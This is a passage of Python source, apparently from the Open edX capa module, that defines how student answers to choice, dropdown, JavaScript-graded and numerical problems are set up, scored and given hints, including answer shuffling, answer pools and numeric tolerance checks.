if self.max_inputfields and len(inputfields) > self.max_inputfields:
msg = "%s: cannot have more than %s input fields" % (
unicode(self), self.max_inputfields)
msg += "\nSee XML source line %s" % getattr(
xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
for prop in self.required_attributes:
if not xml.get(prop):
msg = "Error in problem specification: %s missing required attribute %s" % (
unicode(self), prop)
msg += "\nSee XML source line %s" % getattr(
xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
# ordered list of answer_id values for this response
self.answer_ids = [x.get('id') for x in self.inputfields]
if self.max_inputfields == 1:
# for convenience
self.answer_id = self.answer_ids[0]
# map input_id -> maxpoints
self.maxpoints = dict()
for inputfield in self.inputfields:
# By default, each answerfield is worth 1 point
maxpoints = inputfield.get('points', '1')
self.maxpoints.update({inputfield.get('id'): int(maxpoints)})
# dict for default answer map (provided in input elements)
self.default_answer_map = {}
for entry in self.inputfields:
answer = entry.get('correct_answer')
if answer:
self.default_answer_map[entry.get(
'id')] = contextualize_text(answer, self.context)
if hasattr(self, 'setup_response'):
self.setup_response()
def get_max_score(self):
"""
Return the total maximum points of all answer fields under this Response
"""
return sum(self.maxpoints.values())
def render_html(self, renderer, response_msg=''):
"""
Return XHTML Element tree representation of this Response.
Arguments:
- renderer : procedure which produces HTML given an ElementTree
- response_msg: a message displayed at the end of the Response
"""
# render ourself as a <span> + our content
tree = etree.Element('span')
# problem author can make this span display:inline
if self.xml.get('inline', ''):
tree.set('class', 'inline')
for item in self.xml:
# call provided procedure to do the rendering
item_xhtml = renderer(item)
if item_xhtml is not None:
tree.append(item_xhtml)
tree.tail = self.xml.tail
# Add a <div> for the message at the end of the response
if response_msg:
tree.append(self._render_response_msg_html(response_msg))
return tree
def evaluate_answers(self, student_answers, old_cmap):
"""
Called by capa_problem.LoncapaProblem to evaluate student answers, and to
generate hints (if any).
Returns the new CorrectMap, with (correctness,msg,hint,hintmode) for each answer_id.
"""
new_cmap = self.get_score(student_answers)
self.get_hints(convert_files_to_filenames(
student_answers), new_cmap, old_cmap)
# log.debug('new_cmap = %s' % new_cmap)
return new_cmap
def get_hints(self, student_answers, new_cmap, old_cmap):
"""
Generate adaptive hints for this problem based on student answers, the old CorrectMap,
and the new CorrectMap produced by get_score.
Does not return anything.
Modifies new_cmap, by adding hints to answer_id entries as appropriate.
"""
hintgroup = self.xml.find('hintgroup')
if hintgroup is None:
return
# hint specified by function?
hintfn = hintgroup.get('hintfn')
if hintfn:
# Hint is determined by a function defined in the <script> context; evaluate
# that function to obtain list of hint, hintmode for each answer_id.
# The function should take arguments (answer_ids, student_answers, new_cmap, old_cmap)
# and it should modify new_cmap as appropriate.
# We may extend this in the future to add another argument which provides a
# callback procedure to a social hint generation system.
global CORRECTMAP_PY
if CORRECTMAP_PY is None:
# We need the CorrectMap code for hint functions. No, this is not great.
CORRECTMAP_PY = inspect.getsource(correctmap)
code = (
CORRECTMAP_PY + "\n" +
self.context['script_code'] + "\n" +
textwrap.dedent("""
new_cmap = CorrectMap()
new_cmap.set_dict(new_cmap_dict)
old_cmap = CorrectMap()
old_cmap.set_dict(old_cmap_dict)
{hintfn}(answer_ids, student_answers, new_cmap, old_cmap)
new_cmap_dict.update(new_cmap.get_dict())
old_cmap_dict.update(old_cmap.get_dict())
""").format(hintfn=hintfn)
)
globals_dict = {
'answer_ids': self.answer_ids,
'student_answers': student_answers,
'new_cmap_dict': new_cmap.get_dict(),
'old_cmap_dict': old_cmap.get_dict(),
}
try:
safe_exec.safe_exec(
code,
globals_dict,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
_ = self.capa_system.i18n.ugettext
msg = _('Error {err} in evaluating hint function {hintfn}.').format(err=err, hintfn=hintfn)
sourcenum = getattr(self.xml, 'sourceline', _('(Source code line unavailable)'))
msg += "\n" + _("See XML source line {sourcenum}.").format(sourcenum=sourcenum)
raise ResponseError(msg)
new_cmap.set_dict(globals_dict['new_cmap_dict'])
return
# hint specified by conditions and text dependent on conditions (a-la Loncapa design)
# see http://help.loncapa.org/cgi-bin/fom?file=291
#
# Example:
#
# <formularesponse samples="x@-5:5#11" id="11" answer="$answer">
# <textline size="25" />
# <hintgroup>
# <formulahint samples="x@-5:5#11" answer="$wrongans" name="inversegrad"></formulahint>
# <hintpart on="inversegrad">
# <text>You have inverted the slope in the question. The slope is
# (y2-y1)/(x2 - x1) you have the slope as (x2-x1)/(y2-y1).</text>
# </hintpart>
# </hintgroup>
# </formularesponse>
if (self.hint_tag is not None
and hintgroup.find(self.hint_tag) is not None
and hasattr(self, 'check_hint_condition')):
rephints = hintgroup.findall(self.hint_tag)
hints_to_show = self.check_hint_condition(
rephints, student_answers)
# can be 'on_request' or 'always' (default)
hintmode = hintgroup.get('mode', 'always')
for hintpart in hintgroup.findall('hintpart'):
if hintpart.get('on') in hints_to_show:
hint_text = hintpart.find('text').text
# make the hint appear after the last answer box in this
# response
aid = self.answer_ids[-1]
new_cmap.set_hint_and_mode(aid, hint_text, hintmode)
log.debug('after hint: new_cmap = %s', new_cmap)
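    # A hedged sketch of a hint function satisfying the hintfn contract
    # described above; 'hint_if_negative' is a hypothetical name a problem
    # author would define in the problem's <script> block:
    #
    #   def hint_if_negative(answer_ids, student_answers, new_cmap, old_cmap):
    #       for aid in answer_ids:
    #           if str(student_answers.get(aid, '')).startswith('-'):
    #               new_cmap.set_hint_and_mode(aid, 'Check the sign.', 'always')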
@abc.abstractmethod
def get_score(self, student_answers):
"""
Return a CorrectMap for the answers expected vs given. This includes
(correctness, npoints, msg) for each answer_id.
Arguments:
- student_answers : dict of (answer_id, answer) where answer = student input (string)
"""
pass
@abc.abstractmethod
def get_answers(self):
"""
Return a dict of (answer_id, answer_text) for each answer for this question.
"""
pass
def check_hint_condition(self, hxml_set, student_answers):
"""
Return a list of hints to show.
- hxml_set : list of Element trees, each specifying a condition to be
satisfied for a named hint condition
- student_answers : dict of student answers
Returns a list of names of hint conditions which were satisfied. Those are used
to determine which hints are displayed.
"""
pass
def setup_response(self):
pass
def __unicode__(self):
return u'LoncapaProblem Response %s' % self.xml.tag
def _render_response_msg_html(self, response_msg):
""" Render a <div> for a message that applies to the entire response.
*response_msg* is a string, which may contain XHTML markup
Returns an etree element representing the response message <div> """
# First try wrapping the text in a <div> and parsing
# it as an XHTML tree
try:
response_msg_div = etree.XML('<div>%s</div>' % str(response_msg))
# If we can't do that, create the <div> and set the message
# as the text of the <div>
        except Exception:
response_msg_div = etree.Element('div')
response_msg_div.text = str(response_msg)
# Set the css class of the message <div>
response_msg_div.set("class", "response_message")
return response_msg_div
# These accessor functions allow polymorphic checking of response
# objects without having to call hasattr() directly.
def has_mask(self):
"""True if the response has masking."""
return hasattr(self, '_has_mask')
def has_shuffle(self):
"""True if the response has a shuffle transformation."""
return hasattr(self, '_has_shuffle')
def has_answerpool(self):
"""True if the response has an answer-pool transformation."""
return hasattr(self, '_has_answerpool')
#-----------------------------------------------------------------------------
@registry.register
class JavascriptResponse(LoncapaResponse):
"""
This response type is used when the student's answer is graded via
Javascript using Node.js.
"""
human_name = _('JavaScript Input')
tags = ['javascriptresponse']
max_inputfields = 1
allowed_inputfields = ['javascriptinput']
def setup_response(self):
# Sets up generator, grader, display, and their dependencies.
self.parse_xml()
self.compile_display_javascript()
self.params = self.extract_params()
if self.generator:
self.problem_state = self.generate_problem_state()
else:
self.problem_state = None
self.solution = None
self.prepare_inputfield()
def compile_display_javascript(self):
# TODO FIXME
# arjun: removing this behavior for now (and likely forever). Keeping
# until we decide on exactly how to solve this issue. For now, files are
# manually being compiled to DATA_DIR/js/compiled.
# latestTimestamp = 0
# basepath = self.capa_system.filestore.root_path + '/js/'
# for filename in (self.display_dependencies + [self.display]):
# filepath = basepath + filename
# timestamp = os.stat(filepath).st_mtime
# if timestamp > latestTimestamp:
# latestTimestamp = timestamp
#
# h = hashlib.md5()
# h.update(self.answer_id + str(self.display_dependencies))
# compiled_filename = 'compiled/' + h.hexdigest() + '.js'
# compiled_filepath = basepath + compiled_filename
# if not os.path.exists(compiled_filepath) or os.stat(compiled_filepath).st_mtime < latestTimestamp:
# outfile = open(compiled_filepath, 'w')
# for filename in (self.display_dependencies + [self.display]):
# filepath = basepath + filename
# infile = open(filepath, 'r')
# outfile.write(infile.read())
# outfile.write(';\n')
# infile.close()
# outfile.close()
# TODO this should also be fixed when the above is fixed.
filename = self.capa_system.ajax_url.split('/')[-1] + '.js'
self.display_filename = 'compiled/' + filename
def parse_xml(self):
self.generator_xml = self.xml.xpath('//*[@id=$id]//generator',
id=self.xml.get('id'))[0]
self.grader_xml = self.xml.xpath('//*[@id=$id]//grader',
id=self.xml.get('id'))[0]
self.display_xml = self.xml.xpath('//*[@id=$id]//display',
id=self.xml.get('id'))[0]
self.xml.remove(self.generator_xml)
self.xml.remove(self.grader_xml)
self.xml.remove(self.display_xml)
self.generator = self.generator_xml.get("src")
self.grader = self.grader_xml.get("src")
self.display = self.display_xml.get("src")
if self.generator_xml.get("dependencies"):
self.generator_dependencies = self.generator_xml.get(
"dependencies").split()
else:
self.generator_dependencies = []
if self.grader_xml.get("dependencies"):
self.grader_dependencies = self.grader_xml.get(
"dependencies").split()
else:
self.grader_dependencies = []
if self.display_xml.get("dependencies"):
self.display_dependencies = self.display_xml.get(
"dependencies").split()
else:
self.display_dependencies = []
self.display_class = self.display_xml.get("class")
def get_node_env(self):
js_dir = os.path.join(self.capa_system.filestore.root_path, 'js')
tmp_env = os.environ.copy()
node_path = self.capa_system.node_path + ":" + os.path.normpath(js_dir)
tmp_env["NODE_PATH"] = node_path
return tmp_env
def call_node(self, args):
# Node.js code is un-sandboxed. If the LoncapaSystem says we aren't
# allowed to run unsafe code, then stop now.
if not self.capa_system.can_execute_unsafe_code():
_ = self.capa_system.i18n.ugettext
msg = _("Execution of unsafe Javascript code is not allowed.")
raise LoncapaProblemError(msg)
subprocess_args = ["node"]
subprocess_args.extend(args)
return subprocess.check_output(subprocess_args, env=self.get_node_env())
def generate_problem_state(self):
generator_file = os.path.dirname(os.path.normpath(
__file__)) + '/javascript_problem_generator.js'
output = self.call_node([generator_file,
self.generator,
json.dumps(self.generator_dependencies),
json.dumps(str(self.context['seed'])),
json.dumps(self.params)]).strip()
return json.loads(output)
def extract_params(self):
params = {}
for param in self.xml.xpath('//*[@id=$id]//responseparam',
id=self.xml.get('id')):
raw_param = param.get("value")
params[param.get("name")] = json.loads(
contextualize_text(raw_param, self.context))
return params
def prepare_inputfield(self):
for inputfield in self.xml.xpath('//*[@id=$id]//javascriptinput',
id=self.xml.get('id')):
escapedict = {'"': '"'}
encoded_params = json.dumps(self.params)
encoded_params = saxutils.escape(encoded_params, escapedict)
inputfield.set("params", encoded_params)
encoded_problem_state = json.dumps(self.problem_state)
encoded_problem_state = saxutils.escape(encoded_problem_state,
escapedict)
inputfield.set("problem_state", encoded_problem_state)
inputfield.set("display_file", self.display_filename)
inputfield.set("display_class", self.display_class)
def get_score(self, student_answers):
json_submission = student_answers[self.answer_id]
(all_correct, evaluation, solution) = self.run_grader(json_submission)
self.solution = solution
correctness = 'correct' if all_correct else 'incorrect'
if all_correct:
points = self.get_max_score()
else:
points = 0
return CorrectMap(self.answer_id, correctness, npoints=points, msg=evaluation)
def run_grader(self, submission):
if submission is None or submission == '':
submission = json.dumps(None)
grader_file = os.path.dirname(os.path.normpath(
__file__)) + '/javascript_problem_grader.js'
outputs = self.call_node([grader_file,
self.grader,
json.dumps(self.grader_dependencies),
submission,
json.dumps(self.problem_state),
json.dumps(self.params)]).split('\n')
all_correct = json.loads(outputs[0].strip())
evaluation = outputs[1].strip()
solution = outputs[2].strip()
return (all_correct, evaluation, solution)
def get_answers(self):
if self.solution is None:
(_, _, self.solution) = self.run_grader(None)
return {self.answer_id: self.solution}
#-----------------------------------------------------------------------------
@registry.register
class ChoiceResponse(LoncapaResponse):
"""
This response type is used when the student chooses from a discrete set of
choices. Currently, to be marked correct, all "correct" choices must be
supplied by the student, and no extraneous choices may be included.
This response type allows for two inputtypes: radiogroups and checkbox
groups. radiogroups are used when the student should select a single answer,
and checkbox groups are used when the student may supply 0+ answers.
Note: it is suggested to include a "None of the above" choice when no
answer is correct for a checkboxgroup inputtype; this ensures that a student
must actively mark something to get credit.
If two choices are marked as correct with a radiogroup, the student will
have no way to get the answer right.
TODO: Allow for marking choices as 'optional' and 'required', which would
not penalize a student for including optional answers and would also allow
for questions in which the student can supply one out of a set of correct
    answers. This would also allow for survey-style questions in which all
answers are correct.
Example:
<choiceresponse>
<radiogroup>
<choice correct="false">
<text>This is a wrong answer.</text>
</choice>
<choice correct="true">
<text>This is the right answer.</text>
</choice>
<choice correct="false">
<text>This is another wrong answer.</text>
</choice>
</radiogroup>
</choiceresponse>
In the above example, radiogroup can be replaced with checkboxgroup to allow
the student to select more than one choice.
TODO: In order for the inputtypes to render properly, this response type
must run setup_response prior to the input type rendering. Specifically, the
choices must be given names. This behavior seems like a leaky abstraction,
and it'd be nice to change this at some point.
"""
human_name = _('Checkboxes')
tags = ['choiceresponse']
max_inputfields = 1
allowed_inputfields = ['checkboxgroup', 'radiogroup']
correct_choices = None
def setup_response(self):
self.assign_choice_names()
correct_xml = self.xml.xpath('//*[@id=$id]//choice[@correct="true"]',
id=self.xml.get('id'))
self.correct_choices = set([choice.get(
'name') for choice in correct_xml])
def assign_choice_names(self):
"""
Initialize name attributes in <choice> tags for this response.
"""
for index, choice in enumerate(self.xml.xpath('//*[@id=$id]//choice',
id=self.xml.get('id'))):
choice.set("name", "choice_" + str(index))
def get_score(self, student_answers):
student_answer = student_answers.get(self.answer_id, [])
if not isinstance(student_answer, list):
student_answer = [student_answer]
no_empty_answer = student_answer != []
student_answer = set(student_answer)
required_selected = len(self.correct_choices - student_answer) == 0
no_extra_selected = len(student_answer - self.correct_choices) == 0
correct = required_selected & no_extra_selected & no_empty_answer
if correct:
return CorrectMap(self.answer_id, 'correct')
else:
return CorrectMap(self.answer_id, 'incorrect')
def get_answers(self):
return {self.answer_id: list(self.correct_choices)}
#-----------------------------------------------------------------------------
@registry.register
class MultipleChoiceResponse(LoncapaResponse):
"""
Multiple Choice Response
The shuffle and answer-pool features on this class enable permuting and
subsetting the choices shown to the student.
Both features enable name "masking":
With masking, the regular names of multiplechoice choices
choice_0 choice_1 ... are not used. Instead we use random masked names
mask_2 mask_0 ... so that a view-source of the names reveals nothing about
the original order. We introduce the masked names right at init time, so the
whole software stack works with just the one system of naming.
The .has_mask() test on a response checks for masking, implemented by a
._has_mask attribute on the response object.
The logging functionality in capa_base calls the unmask functions here
to translate back to choice_0 name style for recording in the logs, so
the logging is in terms of the regular names.
"""
# TODO: handle direction and randomize
human_name = _('Multiple Choice')
tags = ['multiplechoiceresponse']
max_inputfields = 1
allowed_inputfields = ['choicegroup']
correct_choices = None
def setup_response(self):
# call secondary setup for MultipleChoice questions, to set name
# attributes
self.mc_setup_response()
# define correct choices (after calling secondary setup)
xml = self.xml
cxml = xml.xpath('//*[@id=$id]//choice', id=xml.get('id'))
# contextualize correct attribute and then select ones for which
# correct = "true"
self.correct_choices = [
contextualize_text(choice.get('name'), self.context)
for choice in cxml
if contextualize_text(choice.get('correct'), self.context) == "true"
]
def mc_setup_response(self):
"""
Initialize name attributes in <choice> stanzas in the <choicegroup> in this response.
Masks the choice names if applicable.
"""
i = 0
for response in self.xml.xpath("choicegroup"):
# Is Masking enabled? -- check for shuffle or answer-pool features
ans_str = response.get("answer-pool")
# Masking (self._has_mask) is off, to be re-enabled with a future PR.
rtype = response.get('type')
if rtype not in ["MultipleChoice"]:
# force choicegroup to be MultipleChoice if not valid
response.set("type", "MultipleChoice")
for choice in list(response):
# The regular, non-masked name:
if choice.get("name") is not None:
name = "choice_" + choice.get("name")
else:
name = "choice_" + str(i)
i += 1
# If using the masked name, e.g. mask_0, save the regular name
# to support unmasking later (for the logs).
if self.has_mask():
mask_name = "mask_" + str(mask_ids.pop())
self._mask_dict[mask_name] = name
choice.set("name", mask_name)
else:
choice.set("name", name)
def late_transforms(self, problem):
"""
Rearrangements run late in the __init__ process.
Cannot do these at response init time, as not enough
other stuff exists at that time.
"""
self.do_shuffle(self.xml, problem)
self.do_answer_pool(self.xml, problem)
def get_score(self, student_answers):
"""
grade student response.
"""
# log.debug('%s: student_answers=%s, correct_choices=%s' % (
# unicode(self), student_answers, self.correct_choices))
if (self.answer_id in student_answers
and student_answers[self.answer_id] in self.correct_choices):
return CorrectMap(self.answer_id, 'correct')
else:
return CorrectMap(self.answer_id, 'incorrect')
def get_answers(self):
return {self.answer_id: self.correct_choices}
def unmask_name(self, name):
"""
Given a masked name, e.g. mask_2, returns the regular name, e.g. choice_0.
Fails with LoncapaProblemError if called on a response that is not masking.
"""
if not self.has_mask():
_ = self.capa_system.i18n.ugettext
# Translators: 'unmask_name' is a method name and should not be translated.
msg = _("unmask_name called on response that is not masked")
raise LoncapaProblemError(msg)
return self._mask_dict[name]
def unmask_order(self):
"""
Returns a list of the choice names in the order displayed to the user,
using the regular (non-masked) names.
"""
# With masking disabled, this computation remains interesting to see
# the displayed order, even though there is no unmasking.
choices = self.xml.xpath('choicegroup/choice')
return [choice.get("name") for choice in choices]
def do_shuffle(self, tree, problem):
"""
For a choicegroup with shuffle="true", shuffles the choices in-place in the given tree
based on the seed. Otherwise does nothing.
Raises LoncapaProblemError if both shuffle and answer-pool are active:
a problem should use one or the other but not both.
Does nothing if the tree has already been processed.
"""
# The tree is already pared down to this <multichoiceresponse> so this query just
# gets the child choicegroup (i.e. no leading //)
choicegroups = tree.xpath('choicegroup[@shuffle="true"]')
if choicegroups:
choicegroup = choicegroups[0]
if choicegroup.get('answer-pool') is not None:
_ = self.capa_system.i18n.ugettext
# Translators: 'shuffle' and 'answer-pool' are attribute names and should not be translated.
msg = _("Do not use shuffle and answer-pool at the same time")
raise LoncapaProblemError(msg)
# Note in the response that shuffling is done.
# Both to avoid double-processing, and to feed the logs.
if self.has_shuffle():
return
self._has_shuffle = True # pylint: disable=attribute-defined-outside-init
# Move elements from tree to list for shuffling, then put them back.
ordering = list(choicegroup.getchildren())
for choice in ordering:
choicegroup.remove(choice)
ordering = self.shuffle_choices(ordering, self.get_rng(problem))
for choice in ordering:
choicegroup.append(choice)
def shuffle_choices(self, choices, rng):
"""
Returns a list of choice nodes with the shuffling done,
using the provided random number generator.
Choices with 'fixed'='true' are held back from the shuffle.
"""
# Separate out a list of the stuff to be shuffled
# vs. the head/tail of fixed==true choices to be held back from the shuffle.
# Rare corner case: A fixed==true choice "island" in the middle is lumped in
# with the tail group of fixed choices.
# Slightly tricky one-pass implementation using a state machine
head = []
middle = [] # only this one gets shuffled
tail = []
at_head = True
for choice in choices:
if at_head and choice.get('fixed') == 'true':
head.append(choice)
continue
at_head = False
if choice.get('fixed') == 'true':
tail.append(choice)
else:
middle.append(choice)
rng.shuffle(middle)
return head + middle + tail
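    # Hedged example of the fixed-choice handling above: for choices
    # [A(fixed), b, c, D(fixed)] the pass yields head=[A], middle=[b, c],
    # tail=[D], so only b and c are shuffled; A stays first and D stays last.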
def get_rng(self, problem):
"""
Get the random number generator to be shared by responses
of the problem, creating it on the problem if needed.
"""
# Multiple questions in a problem share one random number generator (rng) object
# stored on the problem. If each question got its own rng, the structure of multiple
# questions within a problem could appear predictable to the student,
# e.g. (c) keeps being the correct choice. This is due to the seed being
# defined at the problem level, so the multiple rng's would be seeded the same.
# The name _shared_rng begins with an _ to suggest that it is not a facility
# for general use.
# pylint: disable=protected-access
if not hasattr(problem, '_shared_rng'):
problem._shared_rng = random.Random(self.context['seed'])
return problem._shared_rng
def do_answer_pool(self, tree, problem):
"""
Implements the answer-pool subsetting operation in-place on the tree.
        Allows for problem questions with a pool of answers, from which the answer options
        shown to the student are randomly selected so that there is always 1 correct answer and n-1 incorrect answers,
where the author specifies n as the value of the attribute "answer-pool" within <choicegroup>
The <choicegroup> tag must have an attribute 'answer-pool' giving the desired
pool size. If that attribute is zero or not present, no operation is performed.
Calling this a second time does nothing.
Raises LoncapaProblemError if the answer-pool value is not an integer,
or if the number of correct or incorrect choices available is zero.
"""
choicegroups = tree.xpath("choicegroup[@answer-pool]")
if choicegroups:
choicegroup = choicegroups[0]
num_str = choicegroup.get('answer-pool')
if num_str == '0':
return
try:
num_choices = int(num_str)
except ValueError:
_ = self.capa_system.i18n.ugettext
# Translators: 'answer-pool' is an attribute name and should not be translated.
msg = _("answer-pool value should be an integer")
raise LoncapaProblemError(msg)
# Note in the response that answerpool is done.
# Both to avoid double-processing, and to feed the logs.
if self.has_answerpool():
return
self._has_answerpool = True # pylint: disable=attribute-defined-outside-init
choices_list = list(choicegroup.getchildren())
# Remove all choices in the choices_list (we will add some back in later)
for choice in choices_list:
choicegroup.remove(choice)
rng = self.get_rng(problem) # random number generator to use
# Sample from the answer pool to get the subset choices and solution id
(solution_id, subset_choices) = self.sample_from_answer_pool(choices_list, rng, num_choices)
# Add back in randomly selected choices
for choice in subset_choices:
choicegroup.append(choice)
# Filter out solutions that don't correspond to the correct answer we selected to show
# Note that this means that if the user simply provides a <solution> tag, nothing is filtered
solutionset = choicegroup.xpath('../following-sibling::solutionset')
if len(solutionset) != 0:
solutionset = solutionset[0]
solutions = solutionset.xpath('./solution')
for solution in solutions:
if solution.get('explanation-id') != solution_id:
solutionset.remove(solution)
def sample_from_answer_pool(self, choices, rng, num_pool):
"""
Takes in:
1. list of choices
2. random number generator
3. the requested size "answer-pool" number, in effect a max
Returns a tuple with 2 items:
1. the solution_id corresponding with the chosen correct answer
2. (subset) list of choice nodes with num-1 incorrect and 1 correct
Raises an error if the number of correct or incorrect choices is 0.
"""
correct_choices = []
incorrect_choices = []
for choice in choices:
if choice.get('correct') == 'true':
correct_choices.append(choice)
else:
incorrect_choices.append(choice)
# In my small test, capa seems to treat the absence of any correct=
# attribute as equivalent to ="false", so that's what we do here.
# We raise an error if the problem is highly ill-formed.
# There must be at least one correct and one incorrect choice.
# IDEA: perhaps this sort semantic-lint constraint should be generalized to all multichoice
# not just down in this corner when answer-pool is used.
# Or perhaps in the overall author workflow, these errors are unhelpful and
# should all be removed.
if len(correct_choices) < 1 or len(incorrect_choices) < 1:
_ = self.capa_system.i18n.ugettext
# Translators: 'Choicegroup' is an input type and should not be translated.
msg = _("Choicegroup must include at least 1 correct and 1 incorrect choice")
raise LoncapaProblemError(msg)
# Limit the number of incorrect choices to what we actually have
num_incorrect = num_pool - 1
num_incorrect = min(num_incorrect, len(incorrect_choices))
# Select the one correct choice
index = rng.randint(0, len(correct_choices) - 1)
correct_choice = correct_choices[index]
solution_id = correct_choice.get('explanation-id')
# Put together the result, pushing most of the work onto rng.shuffle()
subset_choices = [correct_choice]
rng.shuffle(incorrect_choices)
subset_choices += incorrect_choices[:num_incorrect]
rng.shuffle(subset_choices)
return (solution_id, subset_choices)
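# A hedged, hypothetical markup example exercising the answer-pool path above
# (choice text and explanation ids are illustrative):
#
#   <choicegroup answer-pool="3" type="MultipleChoice">
#     <choice correct="true" explanation-id="sol1">Right answer</choice>
#     <choice correct="false">Wrong answer A</choice>
#     <choice correct="false">Wrong answer B</choice>
#     <choice correct="false">Wrong answer C</choice>
#   </choicegroup>
#
# do_answer_pool() keeps the one correct choice plus two randomly selected
# incorrect ones, then shuffles the resulting three choices.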
@registry.register
class TrueFalseResponse(MultipleChoiceResponse):
human_name = _('True/False Choice')
tags = ['truefalseresponse']
def mc_setup_response(self):
i = 0
for response in self.xml.xpath("choicegroup"):
response.set("type", "TrueFalse")
for choice in list(response):
if choice.get("name") is None:
choice.set("name", "choice_" + str(i))
i += 1
else:
choice.set("name", "choice_" + choice.get("name"))
def get_score(self, student_answers):
correct = set(self.correct_choices)
answers = set(student_answers.get(self.answer_id, []))
if correct == answers:
return CorrectMap(self.answer_id, 'correct')
return CorrectMap(self.answer_id, 'incorrect')
#-----------------------------------------------------------------------------
@registry.register
class OptionResponse(LoncapaResponse):
"""
TODO: handle direction and randomize
"""
human_name = _('Dropdown')
tags = ['optionresponse']
hint_tag = 'optionhint'
allowed_inputfields = ['optioninput']
answer_fields = None
def setup_response(self):
self.answer_fields = self.inputfields
def get_score(self, student_answers):
# log.debug('%s: student_answers=%s' % (unicode(self),student_answers))
cmap = CorrectMap()
amap = self.get_answers()
for aid in amap:
if aid in student_answers and student_answers[aid] == amap[aid]:
cmap.set(aid, 'correct')
else:
cmap.set(aid, 'incorrect')
answer_variable = self.get_student_answer_variable_name(student_answers, aid)
if answer_variable:
cmap.set_property(aid, 'answervariable', answer_variable)
return cmap
def get_answers(self):
amap = dict([(af.get('id'), contextualize_text(af.get(
'correct'), self.context)) for af in self.answer_fields])
# log.debug('%s: expected answers=%s' % (unicode(self),amap))
return amap
def get_student_answer_variable_name(self, student_answers, aid):
"""
        Return the student answer's variable name if it exists in the context, else None.
"""
if aid in student_answers:
for key, val in self.context.iteritems():
                # convert val into unicode because the student answer is always
                # a unicode string, even if the value is a list, dict, etc.
if unicode(val) == student_answers[aid]:
return '$' + key
return None
#-----------------------------------------------------------------------------
@registry.register
class NumericalResponse(LoncapaResponse):
"""
This response type expects a number or formulaic expression that evaluates
to a number (e.g. `4+5/2^2`), and accepts with a tolerance.
"""
human_name = _('Numerical Input')
tags = ['numericalresponse']
hint_tag = 'numericalhint'
allowed_inputfields = ['textline', 'formulaequationinput']
required_attributes = ['answer']
max_inputfields = 1
def __init__(self, *args, **kwargs):
self.correct_answer = ''
self.tolerance = default_tolerance
self.range_tolerance = False
self.answer_range = self.inclusion = None
super(NumericalResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
context = self.context
answer = xml.get('answer')
if answer.startswith(('[', '(')) and answer.endswith((']', ')')): # range tolerance case
self.range_tolerance = True
self.inclusion = (
True if answer.startswith('[') else False, True if answer.endswith(']') else False
)
try:
self.answer_range = [contextualize_text(x, context) for x in answer[1:-1].split(',')]
self.correct_answer = answer[0] + self.answer_range[0] + ', ' + self.answer_range[1] + answer[-1]
except Exception:
log.debug("Content error--answer '%s' is not a valid range tolerance answer", answer)
_ = self.capa_system.i18n.ugettext
raise StudentInputError(
_("There was a problem with the staff answer to this problem.")
)
else:
self.correct_answer = contextualize_text(answer, context)
# Find the tolerance
tolerance_xml = xml.xpath(
'//*[@id=$id]//responseparam[@type="tolerance"]/@default',
id=xml.get('id')
)
if tolerance_xml: # If it isn't an empty list...
self.tolerance = contextualize_text(tolerance_xml[0], context)
def get_staff_ans(self, answer):
"""
Given the staff answer as a string, find its float value.
        Use `evaluator` for this, but for backward compatibility, try the
built-in method `complex` (which used to be the standard).
"""
try:
correct_ans = complex(answer)
except ValueError:
# When `correct_answer` is not of the form X+Yj, it raises a
# `ValueError`. Then test if instead it is a math expression.
# `complex` seems to only generate `ValueErrors`, only catch these.
try:
correct_ans = evaluator({}, {}, answer)
except Exception:
log.debug("Content error--answer '%s' is not a valid number", answer)
_ = self.capa_system.i18n.ugettext
raise StudentInputError(
_("There was a problem with the staff answer to this problem.")
)
return correct_ans
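    # Hedged illustration of the fallback above: complex('2+3j') parses
    # directly, while '4+5/2^2' raises ValueError in complex() and is then
    # evaluated as a math expression by evaluator().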
def get_score(self, student_answers):
"""
Grade a numeric response.
"""
student_answer = student_answers[self.answer_id]
_ = self.capa_system.i18n.ugettext
general_exception = StudentInputError(
_(u"Could not interpret '{student_answer}' as a number.").format(student_answer=cgi.escape(student_answer))
)
# Begin `evaluator` block
# Catch a bunch of exceptions and give nicer messages to the student.
try:
student_float = evaluator({}, {}, student_answer)
except UndefinedVariable as undef_var:
raise StudentInputError(
_(u"You may not use variables ({bad_variables}) in numerical problems.").format(bad_variables=undef_var.message)
)
except ValueError as val_err:
if 'factorial' in val_err.message:
# This is thrown when fact() or factorial() is used in an answer
# that evaluates on negative and/or non-integer inputs
# val_err.message will be: `factorial() only accepts integral values` or
# `factorial() not defined for negative values`
raise StudentInputError(
_("factorial function evaluated outside its domain:"
"'{student_answer}'").format(student_answer=cgi.escape(student_answer))
)
else:
raise general_exception
except ParseException:
raise StudentInputError(
_(u"Invalid math syntax: '{student_answer}'").format(student_answer=cgi.escape(student_answer))
)
except Exception:
raise general_exception
# End `evaluator` block -- we figured out the student's answer!
if self.range_tolerance:
if isinstance(student_float, complex):
raise StudentInputError(_(u"You may not use complex numbers in range tolerance problems"))
boundaries = []
for inclusion, answer in zip(self.inclusion, self.answer_range):
boundary = self.get_staff_ans(answer)
if boundary.imag != 0:
# Translators: This is an error message for a math problem. If the instructor provided a boundary
# (end limit) for a variable that is a complex number (a + bi), this message displays.
raise StudentInputError(_("There was a problem with the staff answer to this problem: complex boundary."))
if isnan(boundary):
# Translators: This is an error message for a math problem. If the instructor did not provide
# a boundary (end limit) for a variable, this message displays.
raise StudentInputError(_("There was a problem with the staff answer to this problem: empty boundary."))
boundaries.append(boundary.real)
if compare_with_tolerance(
student_float,
boundary,
tolerance=float_info.epsilon,
relative_tolerance=True
):
correct = inclusion
break
else:
correct = boundaries[0] < student_float < boundaries[1]
else:
correct_float = self.get_staff_ans(self.correct_answer)
correct = compare_with_tolerance(
student_float, correct_float, self.tolerance
)
if correct:
return CorrectMap(self.answer_id, 'correct')
else:
return CorrectMap(self.answer_id, 'incorrect')
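# Worked example of the two grading paths above (a sketch; the exact
# semantics of `compare_with_tolerance` live outside this class):
#
#     point answer:  correct_answer='100', tolerance='5%'
#         student 103 -> within tolerance  -> 'correct'
#         student 106 -> outside tolerance -> 'incorrect'
#     range answer:  answer='[5,7)'
#         student 5 -> on the inclusive boundary -> 'correct'
#         student 7 -> on the exclusive boundary -> 'incorrect'
#         student 6 -> strictly inside           -> 'correct'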
